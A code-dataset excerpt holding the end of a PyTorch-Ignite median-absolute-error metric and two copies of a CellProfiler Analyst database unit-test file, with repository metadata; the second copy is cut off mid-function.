def median_absolute_error_compute_fn(y_pred: torch.Tensor, y: torch.Tensor) -> float:
e = torch.abs(y.view_as(y_pred) - y_pred)
return torch.median(e).item()
class MedianAbsoluteError(_BaseRegressionEpoch):
r"""Calculates the Median Absolute Error.
.. math::
\text{MdAE} = \text{MD}_{j=1,n} \left( |A_j - P_j| \right)
where :math:`A_j` is the ground truth and :math:`P_j` is the predicted value.
More details can be found in `Botchkarev 2018`__.
- ``update`` must receive output of the form ``(y_pred, y)`` or ``{'y_pred': y_pred, 'y': y}``.
- `y` and `y_pred` must be of same shape `(N, )` or `(N, 1)` and of type `float32`.
.. warning::
Current implementation stores all input data (output and target) in as tensors before computing a metric.
This can potentially lead to a memory error if the input data is larger than available RAM.
__ https://arxiv.org/abs/1809.03006
Args:
output_transform: a callable that is used to transform the
:class:`~ignite.engine.engine.Engine`'s ``process_function``'s output into the
form expected by the metric. This can be useful if, for example, you have a multi-output model and
you want to compute the metric with respect to one of the outputs.
By default, metrics require the output as ``(y_pred, y)`` or ``{'y_pred': y_pred, 'y': y}``.
"""
def __init__(self, output_transform: Callable = lambda x: x):
super(MedianAbsoluteError, self).__init__(median_absolute_error_compute_fn, output_transform)
| 38.772727
| 113
| 0.679367
|
from typing import Callable
import torch
from ignite.contrib.metrics.regression._base import _BaseRegressionEpoch
def median_absolute_error_compute_fn(y_pred: torch.Tensor, y: torch.Tensor) -> float:
e = torch.abs(y.view_as(y_pred) - y_pred)
return torch.median(e).item()
class MedianAbsoluteError(_BaseRegressionEpoch):
def __init__(self, output_transform: Callable = lambda x: x):
super(MedianAbsoluteError, self).__init__(median_absolute_error_compute_fn, output_transform)
| true
| true
|
1c490f47c60297228bf1fa9cffdab0f6612b2215
| 15,337
|
py
|
Python
|
cpa/tests/testdbconnect.py
|
DavidStirling/CellProfiler-Analyst
|
7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9
|
[
"MIT"
] | 98
|
2015-02-05T18:22:04.000Z
|
2022-03-29T12:06:48.000Z
|
cpa/tests/testdbconnect.py
|
DavidStirling/CellProfiler-Analyst
|
7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9
|
[
"MIT"
] | 268
|
2015-01-14T15:43:24.000Z
|
2022-02-13T22:04:37.000Z
|
cpa/tests/testdbconnect.py
|
DavidStirling/CellProfiler-Analyst
|
7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9
|
[
"MIT"
] | 64
|
2015-06-30T22:26:03.000Z
|
2022-03-11T01:06:13.000Z
|
import unittest
from cpa.dbconnect import *
from cpa.properties import Properties
class TestDBConnect(unittest.TestCase):
def setup_mysql(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/nirht_test.properties')
def setup_sqlite(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/nirht_local.properties')
def setup_sqlite2(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/export_to_db_test.properties')
#
# Test module-level functions
#
def test_clean_up_colnames(self):
self.setup_mysql()
def test_well_key_columns(self):
self.setup_mysql()
assert well_key_columns() == ('plate', 'well')
self.setup_sqlite()
assert well_key_columns() == tuple()
def test_image_key_columns(self):
self.setup_mysql()
assert image_key_columns() == ('ImageNumber',)
self.setup_sqlite()
assert image_key_columns() == ('TableNumber','ImageNumber')
def test_object_key_columns(self):
self.setup_mysql()
assert object_key_columns() == ('ImageNumber','ObjectNumber')
self.setup_sqlite()
assert object_key_columns() == ('TableNumber', 'ImageNumber','ObjectNumber')
def test_GetWhereClauseForObjects(self):
self.setup_mysql()
assert GetWhereClauseForObjects([(1,1)]) == '(ImageNumber=1 AND ObjectNumber=1)'
assert GetWhereClauseForObjects([(1,1), (2,1)]) == '(ImageNumber=1 AND ObjectNumber=1 OR ImageNumber=2 AND ObjectNumber=1)'
self.setup_sqlite()
assert GetWhereClauseForObjects([(0,1,1), (0,2,1)]) == '(TableNumber=0 AND ImageNumber=1 AND ObjectNumber=1 OR TableNumber=0 AND ImageNumber=2 AND ObjectNumber=1)'
def test_GetWhereClauseForImages(self):
self.setup_mysql()
assert GetWhereClauseForImages([(1,)]) == 'ImageNumber IN (1)'
assert GetWhereClauseForImages([(1,), (2,)]) == 'ImageNumber IN (1,2)'
self.setup_sqlite()
assert GetWhereClauseForImages([(0,1), (0,2)]) == '(TableNumber=0 AND ImageNumber IN (1,2))'
def test_UniqueObjectClause(self):
self.setup_mysql()
assert UniqueObjectClause() == 'ImageNumber,ObjectNumber'
self.setup_sqlite()
assert UniqueObjectClause() == 'TableNumber,ImageNumber,ObjectNumber'
def test_UniqueImageClause(self):
self.setup_mysql()
assert UniqueImageClause() == 'ImageNumber'
self.setup_sqlite()
assert UniqueImageClause() == 'TableNumber,ImageNumber'
#
# Test class functions
#
def test_Connect_Disconnect(self):
self.setup_mysql()
self.db.connect()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.connect()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.Disconnect()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
self.setup_sqlite()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
self.db.GetAllImageKeys()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.GetAllImageKeys()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.Disconnect()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
def test_Commit(self):
self.setup_mysql()
self.db.connect()
self.db.execute('DROP TABLE IF EXISTS temp_test')
self.db.execute('CREATE TABLE temp_test (id int(11) default NULL)')
self.db.execute('INSERT INTO temp_test values(1)')
self.db.Commit()
self.db.Disconnect()
self.db.connect()
res = self.db.execute('SELECT id FROM temp_test WHERE id=1')
assert res == [(1,)]
self.db.execute('DROP TABLE temp_test')
def test_execute(self):
self.setup_mysql()
self.db.execute('SELECT %s FROM %s'%(self.p.image_id,self.p.image_table))
self.setup_sqlite()
self.db.execute('SELECT %s FROM %s'%(self.p.image_id,self.p.image_table))
def test_GetObjectIDAtIndex(self):
self.setup_mysql()
obKey = self.db.GetObjectIDAtIndex(imKey=(1,), index=94)
assert obKey==(1,94)
self.setup_sqlite()
obKey = self.db.GetObjectIDAtIndex(imKey=(0,1), index=94)
assert obKey==(0,1,94)
def test_GetPerImageObjectCounts(self):
self.setup_mysql()
self.db.GetPerImageObjectCounts()
self.setup_sqlite()
self.db.GetPerImageObjectCounts()
def test_GetObjectCoords(self):
self.setup_mysql()
xy = self.db.GetObjectCoords((1,1))
assert xy==(11.4818, 305.06400000000002)
self.setup_sqlite()
xy = self.db.GetObjectCoords((0,1,1))
assert xy==(11.4818, 305.06400000000002)
def test_GetObjectNear(self):
self.setup_mysql()
obKey = self.db.GetObjectNear((1,), 11, 300)
assert obKey == (1,1)
self.setup_sqlite()
obKey = self.db.GetObjectNear((0,1), 11, 300)
assert obKey == (0,1,1)
def test_GetFullChannelPathsForImage(self):
self.setup_mysql()
paths = self.db.GetFullChannelPathsForImage((1,))
assert paths==['2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d2.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d1.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d0.DIB']
self.setup_sqlite()
paths = self.db.GetFullChannelPathsForImage((0,1))
assert paths==['2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d2.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d1.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d0.DIB']
def test_GetGroupMaps(self):
self.setup_mysql()
groupMaps, colNames = self.db.GetGroupMaps()
assert groupMaps['Gene'][(1,)] == ('Gabra3',)
assert groupMaps['Well'][(1,)] == (1,)
assert groupMaps['Well+Gene'][(1,)] == (1, 'Gabra3')
assert colNames == {'Gene': ['gene'], 'Well': ['well'], 'Well+Gene': ['well', 'gene']}
self.setup_sqlite()
groupMaps, colNames = self.db.GetGroupMaps()
assert groupMaps['96x4'][(0,1)] == (0,1)
assert colNames == {'96x4': ['T2', 'I2']}
def test_GetFilteredImages(self):
self.setup_mysql()
test = set(self.db.GetFilteredImages('MAPs'))
print(test)
vals = set([(239,), (21,), (32,), (197,), (86,), (23,), (61,), (72,), (213,), (222,), (63,), (229,), (221,), (38,), (224,), (231,), (13,), (24,), (78,), (214,), (15,), (223,), (53,), (64,), (246,), (55,), (93,), (232,), (30,), (206,), (95,), (215,), (5,), (16,), (70,), (7,), (45,), (56,), (238,), (198,), (47,), (207,), (85,), (96,), (22,), (87,), (253,), (8,), (62,), (254,), (255,), (199,), (37,), (48,), (205,), (230,), (208,), (39,), (77,), (88,), (14,), (79,), (245,), (256,), (54,), (247,), (29,), (40,), (94,), (31,), (240,), (69,), (80,), (6,), (216,), (71,), (237,), (248,), (200,), (46,)])
assert test == vals
assert self.db.GetFilteredImages('IMPOSSIBLE') == []
self.setup_sqlite()
assert self.db.GetFilteredImages('FirstTen') == [(0,1),(0,2),(0,3),(0,4),(0,5),(0,6),(0,7),(0,8),(0,9),(0,10)]
assert self.db.GetFilteredImages('IMPOSSIBLE') == []
def test_GetColumnNames(self):
self.setup_mysql()
cols = self.db.GetColumnNames(self.p.object_table)
assert cols[:19] == ['ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY', 'Nuclei_Children_Cells_Count', 'Nuclei_Correlation_Correlation_DNA_and_pH3', 'Nuclei_Correlation_Correlation_DNA_and_Actin', 'Nuclei_Correlation_Correlation_pH3_and_Actin', 'Nuclei_AreaShape_Area', 'Nuclei_AreaShape_Eccentricity', 'Nuclei_AreaShape_Solidity', 'Nuclei_AreaShape_Extent', 'Nuclei_AreaShape_Euler_number', 'Nuclei_AreaShape_Perimeter', 'Nuclei_AreaShape_Form_factor', 'Nuclei_AreaShape_MajorAxisLength', 'Nuclei_AreaShape_MinorAxisLength', 'Nuclei_AreaShape_Orientation', 'Nuclei_AreaShape_Zernike0_0']
assert cols[-20:] == ['AreaNormalized_Cytoplasm_AreaShape_Zernike5_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike5_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_8', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_9']
self.setup_sqlite()
cols = self.db.GetColumnNames(self.p.object_table)
assert cols[:20] == ['TableNumber', 'ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY', 'Nuclei_Children_Cells_Count', 'Nuclei_Correlation_Correlation_DNA_and_pH3', 'Nuclei_Correlation_Correlation_DNA_and_Actin', 'Nuclei_Correlation_Correlation_pH3_and_Actin', 'Nuclei_AreaShape_Area', 'Nuclei_AreaShape_Eccentricity', 'Nuclei_AreaShape_Solidity', 'Nuclei_AreaShape_Extent', 'Nuclei_AreaShape_Euler_number', 'Nuclei_AreaShape_Perimeter', 'Nuclei_AreaShape_Form_factor', 'Nuclei_AreaShape_MajorAxisLength', 'Nuclei_AreaShape_MinorAxisLength', 'Nuclei_AreaShape_Orientation', 'Nuclei_AreaShape_Zernike0_0']
assert cols[-20:] == ['AreaNormalized_Cytoplasm_AreaShape_Zernike5_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike5_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_8', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_9']
def test_GetColumnTypes(self):
self.setup_mysql()
cols = self.db.GetColumnTypes(self.p.object_table)
assert cols[:19] == [int, int, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float]
assert cols[-20:] == [float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float]
cols = self.db.GetColumnTypes(self.p.image_table)
assert cols[:20] == [int, int, int, str, int, str, str, str, str, str, str, float, float, float, float, float, float, float, float, float]
def test_GetColnamesForClassifier(self):
self.setup_mysql()
cols = self.db.GetColnamesForClassifier()
for c in ['ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY']:
assert c not in cols
self.setup_sqlite()
cols = self.db.GetColnamesForClassifier()
for c in ['TableNumber', 'ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY']:
assert c not in cols
def test_ReadExportToDB(self):
'''Test reading data from Export to Database.'''
self.setup_sqlite2()
vals = [(1,), (2,), (3,), (4,), (5,), (6,), (7,), (8,), (9,), (10,), (11,), (12,), (13,), (14,), (15,), (16,), (17,), (18,), (19,), (20,)]
groups = {'Plate+Well': {('Week1_22123', 'B05'): [(13,), (14,), (15,), (16,)], ('Week1_22123', 'B02'): [(1,), (2,), (3,), (4,)], ('Week1_22123', 'B04'): [(9,), (10,), (11,), (12,)], ('Week1_22123', 'B06'): [(17,), (18,), (19,), (20,)], ('Week1_22123', 'B03'): [(5,), (6,), (7,), (8,)]}}, {'Plate+Well': ['Image_Metadata_Plate_DAPI', 'Image_Metadata_Well_DAPI']}
assert len(self.db.GetAllImageKeys())==20
assert self.db.GetAllImageKeys() == vals
assert self.db.GetGroupMaps(True) == groups
def test_CreateMySQLTempTableFromData(self):
self.setup_mysql()
data = [['A01', 1, 1.],
['A02', 1, 2.],
['A03', 1, -np.inf],
['A04', 1, np.inf],
['A04', 1, np.nan],
['A04', 1, 100],
['A04', 1, 200],
]
colnames = ['well', 'plate', 'vals']
self.db.CreateTableFromData(data, colnames, '__test_table', temporary=True)
res = self.db.execute('select * from __test_table')
assert res==[('A01', 1, 1.0), ('A02', 1, 2.0), ('A03', 1, None), ('A04', 1, None), ('A04', 1, None), ('A04', 1, 100.0), ('A04', 1, 200.0)]
def test_CreateSQLiteTempTableFromData(self):
self.setup_sqlite()
data = [['A01', 1, 1.],
['A02', 1, 2.],
['A03', 1, -np.inf],
['A04', 1, np.inf],
['A04', 1, np.nan],
['A04', 1, 100],
['A04', 1, 200],
]
colnames = ['well', 'plate', 'vals']
self.db.CreateTableFromData(data, colnames, '__test_table', temporary=True)
res = self.db.execute('select * from __test_table')
assert res==[('A01', 1, 1.0), ('A02', 1, 2.0), ('A03', 1, None), ('A04', 1, None), ('A04', 1, None), ('A04', 1, 100.0), ('A04', 1, 200.0)]
if __name__ == '__main__':
unittest.main()
| 54.386525
| 1,009
| 0.637413
|
import unittest
from cpa.dbconnect import *
from cpa.properties import Properties
class TestDBConnect(unittest.TestCase):
def setup_mysql(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/nirht_test.properties')
def setup_sqlite(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/nirht_local.properties')
def setup_sqlite2(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/export_to_db_test.properties')
def test_clean_up_colnames(self):
self.setup_mysql()
def test_well_key_columns(self):
self.setup_mysql()
assert well_key_columns() == ('plate', 'well')
self.setup_sqlite()
assert well_key_columns() == tuple()
def test_image_key_columns(self):
self.setup_mysql()
assert image_key_columns() == ('ImageNumber',)
self.setup_sqlite()
assert image_key_columns() == ('TableNumber','ImageNumber')
def test_object_key_columns(self):
self.setup_mysql()
assert object_key_columns() == ('ImageNumber','ObjectNumber')
self.setup_sqlite()
assert object_key_columns() == ('TableNumber', 'ImageNumber','ObjectNumber')
def test_GetWhereClauseForObjects(self):
self.setup_mysql()
assert GetWhereClauseForObjects([(1,1)]) == '(ImageNumber=1 AND ObjectNumber=1)'
assert GetWhereClauseForObjects([(1,1), (2,1)]) == '(ImageNumber=1 AND ObjectNumber=1 OR ImageNumber=2 AND ObjectNumber=1)'
self.setup_sqlite()
assert GetWhereClauseForObjects([(0,1,1), (0,2,1)]) == '(TableNumber=0 AND ImageNumber=1 AND ObjectNumber=1 OR TableNumber=0 AND ImageNumber=2 AND ObjectNumber=1)'
def test_GetWhereClauseForImages(self):
self.setup_mysql()
assert GetWhereClauseForImages([(1,)]) == 'ImageNumber IN (1)'
assert GetWhereClauseForImages([(1,), (2,)]) == 'ImageNumber IN (1,2)'
self.setup_sqlite()
assert GetWhereClauseForImages([(0,1), (0,2)]) == '(TableNumber=0 AND ImageNumber IN (1,2))'
def test_UniqueObjectClause(self):
self.setup_mysql()
assert UniqueObjectClause() == 'ImageNumber,ObjectNumber'
self.setup_sqlite()
assert UniqueObjectClause() == 'TableNumber,ImageNumber,ObjectNumber'
def test_UniqueImageClause(self):
self.setup_mysql()
assert UniqueImageClause() == 'ImageNumber'
self.setup_sqlite()
assert UniqueImageClause() == 'TableNumber,ImageNumber'
def test_Connect_Disconnect(self):
self.setup_mysql()
self.db.connect()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.connect()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.Disconnect()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
self.setup_sqlite()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
self.db.GetAllImageKeys()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.GetAllImageKeys()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.Disconnect()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
def test_Commit(self):
self.setup_mysql()
self.db.connect()
self.db.execute('DROP TABLE IF EXISTS temp_test')
self.db.execute('CREATE TABLE temp_test (id int(11) default NULL)')
self.db.execute('INSERT INTO temp_test values(1)')
self.db.Commit()
self.db.Disconnect()
self.db.connect()
res = self.db.execute('SELECT id FROM temp_test WHERE id=1')
assert res == [(1,)]
self.db.execute('DROP TABLE temp_test')
def test_execute(self):
self.setup_mysql()
self.db.execute('SELECT %s FROM %s'%(self.p.image_id,self.p.image_table))
self.setup_sqlite()
self.db.execute('SELECT %s FROM %s'%(self.p.image_id,self.p.image_table))
def test_GetObjectIDAtIndex(self):
self.setup_mysql()
obKey = self.db.GetObjectIDAtIndex(imKey=(1,), index=94)
assert obKey==(1,94)
self.setup_sqlite()
obKey = self.db.GetObjectIDAtIndex(imKey=(0,1), index=94)
assert obKey==(0,1,94)
def test_GetPerImageObjectCounts(self):
self.setup_mysql()
self.db.GetPerImageObjectCounts()
self.setup_sqlite()
self.db.GetPerImageObjectCounts()
def test_GetObjectCoords(self):
self.setup_mysql()
xy = self.db.GetObjectCoords((1,1))
assert xy==(11.4818, 305.06400000000002)
self.setup_sqlite()
xy = self.db.GetObjectCoords((0,1,1))
assert xy==(11.4818, 305.06400000000002)
def test_GetObjectNear(self):
self.setup_mysql()
obKey = self.db.GetObjectNear((1,), 11, 300)
assert obKey == (1,1)
self.setup_sqlite()
obKey = self.db.GetObjectNear((0,1), 11, 300)
assert obKey == (0,1,1)
def test_GetFullChannelPathsForImage(self):
self.setup_mysql()
paths = self.db.GetFullChannelPathsForImage((1,))
assert paths==['2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d2.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d1.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d0.DIB']
self.setup_sqlite()
paths = self.db.GetFullChannelPathsForImage((0,1))
assert paths==['2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d2.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d1.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d0.DIB']
def test_GetGroupMaps(self):
self.setup_mysql()
groupMaps, colNames = self.db.GetGroupMaps()
assert groupMaps['Gene'][(1,)] == ('Gabra3',)
assert groupMaps['Well'][(1,)] == (1,)
assert groupMaps['Well+Gene'][(1,)] == (1, 'Gabra3')
assert colNames == {'Gene': ['gene'], 'Well': ['well'], 'Well+Gene': ['well', 'gene']}
self.setup_sqlite()
groupMaps, colNames = self.db.GetGroupMaps()
assert groupMaps['96x4'][(0,1)] == (0,1)
assert colNames == {'96x4': ['T2', 'I2']}
def test_GetFilteredImages(self):
self.setup_mysql()
test = set(self.db.GetFilteredImages('MAPs'))
print(test)
vals = set([(239,), (21,), (32,), (197,), (86,), (23,), (61,), (72,), (213,), (222,), (63,), (229,), (221,), (38,), (224,), (231,), (13,), (24,), (78,), (214,), (15,), (223,), (53,), (64,), (246,), (55,), (93,), (232,), (30,), (206,), (95,), (215,), (5,), (16,), (70,), (7,), (45,), (56,), (238,), (198,), (47,), (207,), (85,), (96,), (22,), (87,), (253,), (8,), (62,), (254,), (255,), (199,), (37,), (48,), (205,), (230,), (208,), (39,), (77,), (88,), (14,), (79,), (245,), (256,), (54,), (247,), (29,), (40,), (94,), (31,), (240,), (69,), (80,), (6,), (216,), (71,), (237,), (248,), (200,), (46,)])
assert test == vals
assert self.db.GetFilteredImages('IMPOSSIBLE') == []
self.setup_sqlite()
assert self.db.GetFilteredImages('FirstTen') == [(0,1),(0,2),(0,3),(0,4),(0,5),(0,6),(0,7),(0,8),(0,9),(0,10)]
assert self.db.GetFilteredImages('IMPOSSIBLE') == []
def test_GetColumnNames(self):
self.setup_mysql()
cols = self.db.GetColumnNames(self.p.object_table)
assert cols[:19] == ['ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY', 'Nuclei_Children_Cells_Count', 'Nuclei_Correlation_Correlation_DNA_and_pH3', 'Nuclei_Correlation_Correlation_DNA_and_Actin', 'Nuclei_Correlation_Correlation_pH3_and_Actin', 'Nuclei_AreaShape_Area', 'Nuclei_AreaShape_Eccentricity', 'Nuclei_AreaShape_Solidity', 'Nuclei_AreaShape_Extent', 'Nuclei_AreaShape_Euler_number', 'Nuclei_AreaShape_Perimeter', 'Nuclei_AreaShape_Form_factor', 'Nuclei_AreaShape_MajorAxisLength', 'Nuclei_AreaShape_MinorAxisLength', 'Nuclei_AreaShape_Orientation', 'Nuclei_AreaShape_Zernike0_0']
assert cols[-20:] == ['AreaNormalized_Cytoplasm_AreaShape_Zernike5_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike5_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_8', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_9']
self.setup_sqlite()
cols = self.db.GetColumnNames(self.p.object_table)
assert cols[:20] == ['TableNumber', 'ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY', 'Nuclei_Children_Cells_Count', 'Nuclei_Correlation_Correlation_DNA_and_pH3', 'Nuclei_Correlation_Correlation_DNA_and_Actin', 'Nuclei_Correlation_Correlation_pH3_and_Actin', 'Nuclei_AreaShape_Area', 'Nuclei_AreaShape_Eccentricity', 'Nuclei_AreaShape_Solidity', 'Nuclei_AreaShape_Extent', 'Nuclei_AreaShape_Euler_number', 'Nuclei_AreaShape_Perimeter', 'Nuclei_AreaShape_Form_factor', 'Nuclei_AreaShape_MajorAxisLength', 'Nuclei_AreaShape_MinorAxisLength', 'Nuclei_AreaShape_Orientation', 'Nuclei_AreaShape_Zernike0_0']
assert cols[-20:] == ['AreaNormalized_Cytoplasm_AreaShape_Zernike5_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike5_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_8', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_9']
def test_GetColumnTypes(self):
self.setup_mysql()
cols = self.db.GetColumnTypes(self.p.object_table)
assert cols[:19] == [int, int, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float]
assert cols[-20:] == [float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float]
cols = self.db.GetColumnTypes(self.p.image_table)
assert cols[:20] == [int, int, int, str, int, str, str, str, str, str, str, float, float, float, float, float, float, float, float, float]
def test_GetColnamesForClassifier(self):
self.setup_mysql()
cols = self.db.GetColnamesForClassifier()
for c in ['ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY']:
assert c not in cols
self.setup_sqlite()
cols = self.db.GetColnamesForClassifier()
for c in ['TableNumber', 'ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY']:
assert c not in cols
def test_ReadExportToDB(self):
self.setup_sqlite2()
vals = [(1,), (2,), (3,), (4,), (5,), (6,), (7,), (8,), (9,), (10,), (11,), (12,), (13,), (14,), (15,), (16,), (17,), (18,), (19,), (20,)]
